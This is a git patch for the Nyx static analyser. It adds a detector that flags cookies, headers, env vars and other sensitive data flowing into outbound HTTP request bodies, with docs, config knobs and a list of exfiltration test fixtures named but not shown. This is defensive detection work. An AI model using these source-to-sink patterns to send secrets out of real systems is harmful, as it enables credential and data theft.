From 58f1794a4e40210052af84d180472e0ddfacbbf2 Mon Sep 17 00:00:00 2001 From: Eli Peter <54954007+elicpeter@users.noreply.github.com> Date: Fri, 1 May 2026 10:59:52 -0400 Subject: [PATCH] Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59) * feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers * feat: Implement cross-file data exfiltration detection with parameter-specific gate filters * feat: Add calibration tests and refine DATA_EXFIL severity scoring logic * feat: Introduce per-detector configuration for data exfiltration suppression * feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output * feat: Add tainted body and URL handling for data exfiltration detection * feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go * feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients * feat: Add synthetic externals handling for closure-captured variables in SSA * feat: Implement closure-based suppression for resource leak findings * feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns * feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders * feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt * feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests * feat: Add data exfiltration sinks for various languages and enhance documentation * refactor: Simplify formatting and improve readability in various files * refactor: Improve readability by simplifying conditional statements and adding clippy linting * docs: Update CHANGELOG and comments for data exfiltration features and configuration * docs: Clarify configuration instructions for data exfiltration trusted destinations * docs: Enhance comments for evidence routing logic in data exfiltration --- CHANGELOG.md | 12 +- README.md | 2 +- benches/scan_bench.rs | 1 + default-nyx.conf | 25 + docs/advanced-analysis.md | 13 + docs/configuration.md | 23 +- docs/detectors.md | 6 +- docs/detectors/taint.md | 122 ++- frontend/src/pages/FindingDetailPage.tsx | 9 +- src/ast.rs | 170 +++- src/cfg/cfg_tests.rs | 1 + src/cfg/helpers.rs | 17 +- src/cfg/literals.rs | 403 +++++++++- src/cfg/mod.rs | 317 +++++++- src/cfg_analysis/guards.rs | 46 +- src/cfg_analysis/mod.rs | 7 + src/cfg_analysis/resources.rs | 17 + src/cfg_analysis/tests.rs | 6 + src/commands/mod.rs | 4 + src/constraint/domain.rs | 2 + src/constraint/lower.rs | 2 + src/database.rs | 63 ++ src/evidence.rs | 80 +- src/labels/c.rs | 29 +- src/labels/cpp.rs | 24 +- src/labels/go.rs | 380 ++++++++- src/labels/java.rs | 82 ++ src/labels/javascript.rs | 199 ++++- src/labels/mod.rs | 178 +++- src/labels/php.rs | 63 +- src/labels/python.rs | 760 +++++++++++++++++- src/labels/ruby.rs | 59 ++ src/labels/rust.rs | 118 +++ src/labels/typescript.rs | 149 +++- src/output.rs | 12 + src/pointer/analysis.rs | 4 + src/rank.rs | 11 +- src/server/debug.rs | 4 + src/server/owasp.rs | 28 + src/server/routes/debug.rs | 8 + src/ssa/alias.rs | 2 + src/ssa/const_prop.rs | 2 + src/ssa/copy_prop.rs | 14 + src/ssa/dce.rs | 22 + src/ssa/invariants.rs | 8 + src/ssa/ir.rs | 23 +- src/ssa/lower.rs | 81 +- src/ssa/param_points_to.rs | 2 + src/ssa/static_map.rs | 2 + src/ssa/type_facts.rs | 131 ++- src/state/facts.rs | 47 +- src/state/mod.rs | 97 +++ src/state/transfer.rs | 13 + src/summary/ssa_summary.rs | 33 + src/summary/tests.rs | 16 + src/symex/executor.rs | 16 + src/symex/loops.rs | 22 + src/symex/mod.rs | 8 + src/symex/state.rs | 12 + src/symex/transfer.rs | 15 + src/symex/witness.rs | 31 +- src/taint/backwards.rs | 46 ++ src/taint/ssa_transfer/mod.rs | 482 ++++++++++- src/taint/ssa_transfer/state.rs | 2 + src/taint/ssa_transfer/summary_extract.rs | 32 + src/taint/ssa_transfer/tests.rs | 30 + src/utils/config.rs | 15 + src/utils/detector_options.rs | 129 +++ src/utils/mod.rs | 2 + tests/backwards_analysis_tests.rs | 28 +- .../c/data_exfil/exfil_curl_postfields_env.c | 17 + .../c/safe/safe_data_exfil_user_input_echo.c | 16 + .../data_exfil/exfil_http_post_cookie_body.go | 14 + .../safe/safe_data_exfil_user_input_echo.go | 15 + .../data_exfil/DataExfilJdkHttpClient.java | 23 + .../java/data_exfil/DataExfilOkHttp.java | 24 + .../data_exfil/exfil_fetch_cookie_body.js | 10 + .../exfil_fetch_external_destination.js | 10 + .../data_exfil/exfil_xhr_send_header.js | 9 + .../safe/safe_data_exfil_sanitizer_wrap.js | 8 + .../safe/safe_data_exfil_user_input_echo.js | 10 + .../data_exfil/exfil_httpx_async_post_env.py | 17 + .../exfil_requests_post_env_dict.py | 16 + .../safe/safe_data_exfil_user_input_echo.py | 14 + .../data_exfil/exfil_net_http_post_cookie.rb | 10 + .../safe/safe_data_exfil_user_input_echo.rb | 12 + .../rust/data_exfil/exfil_reqwest_form_env.rs | 10 + .../data_exfil/exfil_fetch_cookie_body.ts | 10 + .../data_exfil/exfil_fetch_header_body.ts | 10 + tests/benchmark/ground_truth.json | 572 ++++++++++++- tests/benchmark/results/latest.json | 606 +++++++++++--- tests/benchmark_test.rs | 28 + tests/calibration_data_exfil.rs | 283 +++++++ tests/cross_file_data_exfil_split_tests.rs | 48 ++ tests/data_exfil_go_integration_tests.rs | 212 +++++ tests/data_exfil_java_integration_tests.rs | 138 ++++ tests/db_corruption_tests.rs | 9 +- tests/fetch_data_exfil_integration_tests.rs | 110 ++- tests/fetch_data_exfil_suppression_tests.rs | 142 ++++ .../caller_body_tainted.js | 16 + .../caller_url_tainted.js | 14 + .../expectations.json | 22 + .../cross_file_data_exfil_split/helper.js | 10 + .../caller_body_tainted.go | 17 + .../caller_url_tainted.go | 16 + .../expectations.json | 22 + .../cross_file_go_data_exfil/helper.go | 16 + .../caller_body_tainted.py | 18 + .../caller_url_tainted.py | 17 + .../expectations.json | 22 + .../cross_file_python_data_exfil/helper.py | 12 + .../fixtures/demand_driven_data_exfil/app.py | 20 + .../expectations.json | 16 + tests/fixtures/go/data_exfil_http_post.go | 19 + tests/fixtures/go/data_exfil_map_assign.go | 27 + .../fixtures/go/data_exfil_new_request_do.go | 24 + tests/fixtures/go/data_exfil_post_form.go | 18 + .../go/data_exfil_user_input_silenced.go | 19 + tests/fixtures/go/ssrf_url_tainted.go | 18 + .../java/data_exfil_apache_httpclient.java | 27 + .../java/data_exfil_jdk_httpclient.java | 28 + tests/fixtures/java/data_exfil_okhttp.java | 28 + .../java/data_exfil_resttemplate.java | 23 + tests/fixtures/java/data_exfil_webclient.java | 20 + .../java/ssrf_url_only_no_data_exfil.java | 25 + tests/fixtures/js/fetch_body_data_exfil.js | 14 +- .../fixtures/js/fetch_body_int_suppressed.js | 19 + .../js/fetch_body_user_input_silenced.js | 15 + .../fetch_data_exfil_allowlist_suppressed.js | 17 + .../fetch_data_exfil_external_destination.js | 15 + .../js/fetch_data_exfil_sanitizer_wrap.js | 13 + .../c/taint/data_exfil_curl_postfields.c | 13 + .../data_exfil_curl_postfields.expect.json | 13 + .../c/taint/data_exfil_user_input_silenced.c | 13 + ...data_exfil_user_input_silenced.expect.json | 13 + .../cpp/taint/data_exfil_curl_postfields.cpp | 13 + .../data_exfil_curl_postfields.expect.json | 13 + .../taint/data_exfil_user_input_silenced.cpp | 13 + ...data_exfil_user_input_silenced.expect.json | 13 + .../taint/array_push_data_exfil.expect.json | 19 + .../javascript/taint/array_push_data_exfil.js | 21 + .../taint/await_fetch_data_exfil.expect.json | 19 + .../taint/await_fetch_data_exfil.js | 18 + .../constructor_cap_narrow_safe.expect.json | 13 + .../taint/constructor_cap_narrow_safe.js | 17 + .../taint/fetch_session_forward.expect.json | 19 + .../javascript/taint/fetch_session_forward.js | 18 + .../taint/fetch_tainted_body_safe.expect.json | 8 +- .../data_exfil_curl_postfields.expect.json | 13 + .../php/taint/data_exfil_curl_postfields.php | 10 + ...data_exfil_user_input_silenced.expect.json | 13 + .../taint/data_exfil_user_input_silenced.php | 9 + .../taint/dict_set_data_exfil.expect.json | 19 + .../python/taint/dict_set_data_exfil.py | 23 + .../httpx_async_post_data_exfil.expect.json | 13 + .../taint/httpx_async_post_data_exfil.py | 20 + .../requests_post_session_token.expect.json | 13 + .../taint/requests_post_session_token.py | 18 + ...sts_post_url_tainted_ssrf_only.expect.json | 19 + .../requests_post_url_tainted_ssrf_only.py | 18 + ...uests_post_user_input_silenced.expect.json | 13 + .../requests_post_user_input_silenced.py | 19 + .../data_exfil_net_http_post.expect.json | 13 + .../ruby/taint/data_exfil_net_http_post.rb | 8 + ...data_exfil_user_input_silenced.expect.json | 13 + .../taint/data_exfil_user_input_silenced.rb | 9 + .../data_exfil_hyper_builder.expect.json | 31 + .../rust/taint/data_exfil_hyper_builder.rs | 12 + .../data_exfil_reqwest_async_send.expect.json | 19 + .../taint/data_exfil_reqwest_async_send.rs | 15 + .../taint/data_exfil_reqwest_body.expect.json | 23 + .../rust/taint/data_exfil_reqwest_body.rs | 12 + .../taint/data_exfil_reqwest_form.expect.json | 23 + .../rust/taint/data_exfil_reqwest_form.rs | 10 + .../taint/data_exfil_reqwest_json.expect.json | 23 + .../rust/taint/data_exfil_reqwest_json.rs | 10 + .../rust/taint/data_exfil_surf.expect.json | 23 + .../real_world/rust/taint/data_exfil_surf.rs | 9 + .../rust/taint/data_exfil_ureq.expect.json | 23 + .../real_world/rust/taint/data_exfil_ureq.rs | 8 + .../ssrf_url_only_no_data_exfil.expect.json | 31 + .../rust/taint/ssrf_url_only_no_data_exfil.rs | 10 + .../for_of_destructure_taint.expect.json | 14 + .../taint/for_of_destructure_taint.ts | 19 + .../taint/shell_array_safe_const.expect.json | 38 + .../taint/shell_array_safe_const.ts | 52 ++ .../taint/shell_array_via_wrapper.expect.json | 14 + .../taint/shell_array_via_wrapper.ts | 31 + tests/ssa_equivalence_tests.rs | 6 + 189 files changed, 8421 insertions(+), 383 deletions(-) create mode 100644 src/utils/detector_options.rs create mode 100644 tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c create mode 100644 tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c create mode 100644 tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go create mode 100644 tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go create mode 100644 tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java create mode 100644 tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js create mode 100644 tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js create mode 100644 tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js create mode 100644 tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py create mode 100644 tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py create mode 100644 tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py create mode 100644 tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb create mode 100644 tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb create mode 100644 tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs create mode 100644 tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts create mode 100644 tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts create mode 100644 tests/calibration_data_exfil.rs create mode 100644 tests/cross_file_data_exfil_split_tests.rs create mode 100644 tests/data_exfil_go_integration_tests.rs create mode 100644 tests/data_exfil_java_integration_tests.rs create mode 100644 tests/fetch_data_exfil_suppression_tests.rs create mode 100644 tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js create mode 100644 tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js create mode 100644 tests/fixtures/cross_file_data_exfil_split/expectations.json create mode 100644 tests/fixtures/cross_file_data_exfil_split/helper.js create mode 100644 tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go create mode 100644 tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go create mode 100644 tests/fixtures/cross_file_go_data_exfil/expectations.json create mode 100644 tests/fixtures/cross_file_go_data_exfil/helper.go create mode 100644 tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py create mode 100644 tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py create mode 100644 tests/fixtures/cross_file_python_data_exfil/expectations.json create mode 100644 tests/fixtures/cross_file_python_data_exfil/helper.py create mode 100644 tests/fixtures/demand_driven_data_exfil/app.py create mode 100644 tests/fixtures/demand_driven_data_exfil/expectations.json create mode 100644 tests/fixtures/go/data_exfil_http_post.go create mode 100644 tests/fixtures/go/data_exfil_map_assign.go create mode 100644 tests/fixtures/go/data_exfil_new_request_do.go create mode 100644 tests/fixtures/go/data_exfil_post_form.go create mode 100644 tests/fixtures/go/data_exfil_user_input_silenced.go create mode 100644 tests/fixtures/go/ssrf_url_tainted.go create mode 100644 tests/fixtures/java/data_exfil_apache_httpclient.java create mode 100644 tests/fixtures/java/data_exfil_jdk_httpclient.java create mode 100644 tests/fixtures/java/data_exfil_okhttp.java create mode 100644 tests/fixtures/java/data_exfil_resttemplate.java create mode 100644 tests/fixtures/java/data_exfil_webclient.java create mode 100644 tests/fixtures/java/ssrf_url_only_no_data_exfil.java create mode 100644 tests/fixtures/js/fetch_body_int_suppressed.js create mode 100644 tests/fixtures/js/fetch_body_user_input_silenced.js create mode 100644 tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js create mode 100644 tests/fixtures/js/fetch_data_exfil_external_destination.js create mode 100644 tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js create mode 100644 tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js create mode 100644 tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js create mode 100644 tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/fetch_session_forward.js create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_user_input_silenced.php create mode 100644 tests/fixtures/real_world/python/taint/dict_set_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/python/taint/dict_set_data_exfil.py create mode 100644 tests/fixtures/real_world/python/taint/httpx_async_post_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/python/taint/httpx_async_post_data_exfil.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_session_token.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_session_token.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_url_tainted_ssrf_only.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_url_tainted_ssrf_only.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_user_input_silenced.py create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_net_http_post.expect.json create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_net_http_post.rb create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_user_input_silenced.rb create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_hyper_builder.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_hyper_builder.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_async_send.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_async_send.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_body.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_body.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_form.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_form.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_json.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_json.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_surf.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_surf.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_ureq.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_ureq.rs create mode 100644 tests/fixtures/real_world/rust/taint/ssrf_url_only_no_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/ssrf_url_only_no_data_exfil.rs create mode 100644 tests/fixtures/real_world/typescript/taint/for_of_destructure_taint.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/for_of_destructure_taint.ts create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts diff --git a/CHANGELOG.md b/CHANGELOG.md index e7e84fd2..14f13de4 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,7 +4,17 @@ All notable changes to Nyx are documented here. The format is based on [Keep a C ## [Unreleased] -_No changes yet._ +### Added + +- New `taint-data-exfiltration` rule, separate from SSRF. Fires when a Sensitive-tier source (cookie, header, env, file, database, caught exception) reaches the body, headers, or json payload of an outbound HTTP call. Plain user input gets suppressed at emission time so a gateway echoing `req.body` back upstream is not flagged. +- Sinks ship for `fetch` body, `XMLHttpRequest.send`, Python `requests.post` and `httpx.AsyncClient.post`, Java JDK `HttpClient.send` with `BodyPublishers`, OkHttp builder chains, Apache HttpClient `execute`, RestTemplate, WebClient, Go `http.Post` and `http.NewRequest` + `Do`, Rust `reqwest`/`ureq`/`surf`/`hyper` body/json/form/multipart chains, Ruby `Net::HTTP.post` and RestClient, C and C++ `curl_easy_setopt(CURLOPT_POSTFIELDS, ...)` gated by the macro arg. +- Three suppression knobs: + - Sanitizer convention. `logEvent`, `forwardPayload`, `tracker.send`, `analytics.track`, `metrics.report`, `serializeForUpstream` are treated as `Sanitizer(data_exfil)` by default. Add your own with the standard custom-rule path. + - Trusted destination allowlist in `detectors.data_exfil.trusted_destinations`. Matched against the abstract-string domain prefix; a literal or template prefix that begins with one of these entries drops the cap. + - Detector toggle `detectors.data_exfil.enabled = false` strips the cap before emission. Other taint classes are unaffected. +- Calibration. Severity is High for cookie or env sources, Medium for header, file, database, or caught-exception sources. Confidence stays at Medium even with strong corroboration, drops to Low without abstract or symbolic backing, and drops one tier on path-validated flows. SARIF output carries a `properties.data_exfil_field` entry on data-exfil findings, set to the destination object-literal field the leak reached (`body`, `headers`, or `json`). +- Benchmark coverage. 13 vulnerable fixtures across 8 languages under `tests/benchmark/corpus/{lang}/data_exfil/` and 6 paired safe fixtures for the sensitivity gate and sanitizer convention. New `data_exfil` row in the per-class breakdown. Per-class CI floor at P, R, F1 ≥ 0.85 (current baseline is 1.000). +- Backwards taint walk recognises `Cap::DATA_EXFIL` and emits the same rule ID. ## [0.5.0] - 2026-04-29 diff --git a/README.md b/README.md index 1d371835..cc522345 100644 --- a/README.md +++ b/README.md @@ -194,7 +194,7 @@ kind = "sanitizer" cap = "html_escape" ``` -Or add rules interactively: `nyx config add-rule --lang javascript --matcher escapeHtml --kind sanitizer --cap html_escape`. Caps: `env_var`, `html_escape`, `shell_escape`, `url_encode`, `json_parse`, `file_io`, `fmt_string`, `sql_query`, `deserialize`, `ssrf`, `code_exec`, `crypto`, `unauthorized_id`, `all`. Full schema: [Configuration](https://elicpeter.github.io/nyx/configuration.html). +Or add rules interactively: `nyx config add-rule --lang javascript --matcher escapeHtml --kind sanitizer --cap html_escape`. Caps: `env_var`, `html_escape`, `shell_escape`, `url_encode`, `json_parse`, `file_io`, `fmt_string`, `sql_query`, `deserialize`, `ssrf`, `data_exfil`, `code_exec`, `crypto`, `unauthorized_id`, `all`. Full schema: [Configuration](https://elicpeter.github.io/nyx/configuration.html). --- diff --git a/benches/scan_bench.rs b/benches/scan_bench.rs index 472505f4..ad42c851 100644 --- a/benches/scan_bench.rs +++ b/benches/scan_bench.rs @@ -157,6 +157,7 @@ fn bench_state_analysis_only(c: &mut Criterion) { &[], &std::collections::HashSet::new(), None, + None, ) }); }); diff --git a/default-nyx.conf b/default-nyx.conf index 919635e4..81535366 100644 --- a/default-nyx.conf +++ b/default-nyx.conf @@ -299,6 +299,31 @@ interprocedural = true smt = true +# ─── Detector knobs ────────────────────────────────────────────────── +# Per-detector class suppression and enablement. These knobs target +# common false-positive classes that show up on legitimate forwarding +# pipelines (telemetry / analytics / metrics dispatch). +# +# [detectors.data_exfil] +# +# # Toggle the entire `taint-data-exfiltration` detector class. Set to +# # false on projects whose architecture routes user-derived payloads +# # through trusted forwarding boundaries by design. +# enabled = true +# +# # URL prefixes treated as trusted destinations. Outbound calls whose +# # destination argument has a static prefix (proven by the abstract +# # string domain or visible as a literal) matching one of these entries +# # have `Cap::DATA_EXFIL` dropped before event emission. Mirrors the +# # SSRF prefix-lock semantics. Use full origins or origin-prefixed +# # paths (e.g. "https://api.internal/") so partial matches across +# # unrelated hosts cannot occur. +# trusted_destinations = [ +# "https://api.internal/", +# "https://telemetry.", +# ] + + # ─── Per-language analysis rules ───────────────────────────────────── # [analysis.languages.javascript.auth] diff --git a/docs/advanced-analysis.md b/docs/advanced-analysis.md index b648265b..c9641ef0 100644 --- a/docs/advanced-analysis.md +++ b/docs/advanced-analysis.md @@ -245,6 +245,19 @@ cross-function body expansion. See `DEFAULT_BACKWARDS_DEPTH`, `BACKWARDS_VALUE_BUDGET`, and `MAX_BACKWARDS_CALLEE_BLOCKS` in `src/taint/backwards.rs` for the exact bounds. +**Cap parity.** The walk treats `DemandState.caps` as opaque bitflags, +every cap defined in `src/labels/mod.rs` round-trips identically through +the demand transfer. Including `Cap::DATA_EXFIL` (bit 13): a +`taint-data-exfiltration` forward finding receives `backwards-confirmed` +exactly like a `taint-unsanitised-flow` SQL/CMD/SSRF finding when its +demand walk reaches a Sensitive source. The cap-routing logic in +`src/ast.rs` then surfaces the rule id correctly regardless of which +direction confirmed the flow. See +`tests/backwards_analysis_tests.rs::demand_driven_suite` (the +`data_exfil` sub-case) and +`taint::backwards::tests::driver_walks_data_exfil_source_to_sink` for +the regression guards. + **Source**: [`src/taint/backwards.rs`](https://github.com/elicpeter/nyx/blob/master/src/taint/backwards.rs). --- diff --git a/docs/configuration.md b/docs/configuration.md index a001bf9b..dacf1b07 100644 --- a/docs/configuration.md +++ b/docs/configuration.md @@ -213,6 +213,26 @@ CLI flag map (each pair is `--enable / --no-enable`): **Explain effective engine**: pass `--explain-engine` to print the resolved engine configuration (profile + config + CLI overrides) and exit without scanning. +### `[detectors.data_exfil]` + +Per-project tuning for the `taint-data-exfiltration` rule. All fields are optional. + +| Field | Type | Default | Description | +|-------|------|---------|-------------| +| `enabled` | bool | `true` | Set `false` to strip `Cap::DATA_EXFIL` from sink caps before emission. No `taint-data-exfiltration` finding reaches the report. Other taint classes are not affected. | +| `trusted_destinations` | [string] | `[]` | URL prefixes that drop `Cap::DATA_EXFIL` on the call site. Matched against the abstract-string domain prefix of the destination arg, so a literal URL or a template literal with a static prefix both work. Use full origins or origin-pinned paths and include the trailing `/`, otherwise `https://api.` matches `https://api.evil.example.com/` too. | + +```toml +[detectors.data_exfil] +enabled = true +trusted_destinations = [ + "https://api.internal/", + "https://telemetry.example.com/", +] +``` + +For the sanitizer convention, source sensitivity gate, and per-language sink coverage, see [Detectors / Taint / DATA_EXFIL](detectors/taint.md#data_exfil-suppression-layers). + ### `[analysis.languages.]` Per-language custom rules. `` is one of: `rust`, `javascript`, `typescript`, `python`, `go`, `java`, `c`, `cpp`, `php`, `ruby`. @@ -232,7 +252,8 @@ kind = "sanitizer" # "source" | "sanitizer" | "sink" cap = "html_escape" # "env_var" | "html_escape" | "shell_escape" | # "url_encode" | "json_parse" | "file_io" | # "fmt_string" | "sql_query" | "deserialize" | - # "ssrf" | "code_exec" | "crypto" | "all" + # "ssrf" | "data_exfil" | "code_exec" | "crypto" | + # "unauthorized_id" | "all" ``` --- diff --git a/docs/detectors.md b/docs/detectors.md index 1400df8e..28eab269 100644 --- a/docs/detectors.md +++ b/docs/detectors.md @@ -49,11 +49,13 @@ score = severity_base + analysis_kind + evidence_strength + state_bonus - valida | Component | Values | |---|---| | Severity base | High=60, Medium=30, Low=10 | -| Analysis kind | taint=+10, state=+8, cfg with evidence=+5, cfg without evidence=+3, ast=+0 | +| Analysis kind | taint=+10, taint-data-exfiltration=+7, state=+8, cfg with evidence=+5, cfg without evidence=+3, ast=+0 | | Evidence strength | +1 per evidence item up to 4; +2 to +6 for source kind | | State bonus | use-after-close / unauthed=+6, double-close=+3, must-leak=+2, may-leak=+1 | | Validation penalty | -5 if path-validated | +DATA_EXFIL is calibrated below other taint classes by design. Severity is High only when the source carries credential / session material (cookies, env vars); other Sensitive sources (request headers, file system, database, caught exception) downgrade to Medium. Confidence is capped at Medium and only fires Medium when the abstract / symbolic domain corroborates a concrete string body reaching the outbound payload; otherwise it falls to Low. A guarded flow (`path_validated`) drops a confidence tier. The intent is to seat data-exfiltration findings below SSRF / SQLi / command-injection but above informational AST patterns. + Source-kind contributions (taint only): | Source | Bonus | @@ -71,7 +73,9 @@ Approximate score ranges: | High taint with user input | 76 to 81 | | High state (use-after-close) | ~74 | | High CFG structural | 63 to 68 | +| High DATA_EXFIL (cookie / env source, body confirmed) | ~76 | | Medium taint with env source | 45 to 50 | +| Medium DATA_EXFIL (header / fs / db / caught-exception source) | 40 to 45 | | Medium state (resource leak) | ~40 | | Low AST-only pattern | ~10 | diff --git a/docs/detectors/taint.md b/docs/detectors/taint.md index 7002a3a6..5cf2b754 100644 --- a/docs/detectors/taint.md +++ b/docs/detectors/taint.md @@ -135,10 +135,130 @@ Sources, sanitizers, and sinks are linked by named capabilities. A sanitizer onl | `sql_query` | | parameterized query binders | `cursor.execute`, `db.query` with concatenation | | `deserialize` | | | `pickle.loads`, `yaml.load`, `Marshal.load` | | `ssrf` | | URL-prefix locks | `requests.get`, `fetch` URL arg, outbound HTTP destination | -| `data_exfil` | | | `fetch` body / headers / json, `XMLHttpRequest.send` body | +| `data_exfil` | cookies, headers, env, db rows, file reads (Sensitive-tier sources only) | | `fetch` body / headers / json, `XMLHttpRequest.send` body | | `code_exec` | | | `eval`, `exec`, `Function` | | `crypto` | | | weak-algorithm constructors | | `unauthorized_id` | request-bound scoped IDs (Rust auth analysis) | ownership check | row-level write | | `all` | Sources typically use `all` so they match any sink | | | Sources typically use `cap = "all"` so they match every sink. Sinks declare the specific cap they need. Sanitizers only clear the cap they name. + +## Source sensitivity + +Some detector classes need to know not just *that* a value is attacker-influenced but *what kind* of value it is. Each source carries a `SourceKind` (`UserInput`, `Cookie`, `Header`, `EnvironmentConfig`, `FileSystem`, `Database`, `CaughtException`, `Unknown`) and a derived sensitivity tier: + +| Tier | Source kinds | Meaning | +|---|---|---| +| `Plain` | `UserInput` (request bodies, query strings, form fields, argv, stdin) | Attacker-controlled but already in the attacker's hands. Echoing it back to them is not a disclosure. | +| `Sensitive` | `Cookie`, `Header`, `EnvironmentConfig`, `FileSystem`, `Database`, `CaughtException`, `Unknown` | Operator-bound state that should not leak across boundaries. | +| `Secret` | (reserved for explicit credential sources) | Highest tier; treated identically to `Sensitive` today. | + +`Cap::DATA_EXFIL` only fires when the contributing source is at least `Sensitive`. Plain user input flowing into an outbound `fetch` body is suppressed at finding-emission time — the canonical false-positive class for API gateways and telemetry forwarders that proxy `req.body`. SSRF and other classes are unaffected; the gate is scoped to `DATA_EXFIL`. + +If a project legitimately classifies a request body as sensitive (e.g. an internal forwarder where `req.body` carries a pre-authenticated user token), override via custom rules in `nyx.conf`: + +```toml +# Treat the forwarder's outbound payload as already-sanitized so the +# DATA_EXFIL gate stops firing on it. +[[analysis.languages.javascript.rules]] +matchers = ["sanitizeOutbound"] +kind = "sanitizer" +cap = "data_exfil" +``` + +Or re-classify the source itself with a custom Source rule whose name matches one of the Sensitive substrings (`cookie`, `header`). + +## DATA_EXFIL suppression layers + +Three knobs ship out of the box so projects can match the cap to their architecture without per-call suppressions. + +### 1. Forwarding-wrapper sanitizer convention + +A named function that exists to *forward* a payload across a known boundary is the developer's explicit decision to send the data. The default sanitizer rules treat the following identifiers as `Sanitizer(data_exfil)` in JavaScript and TypeScript: + +``` +serializeForUpstream +forwardPayload 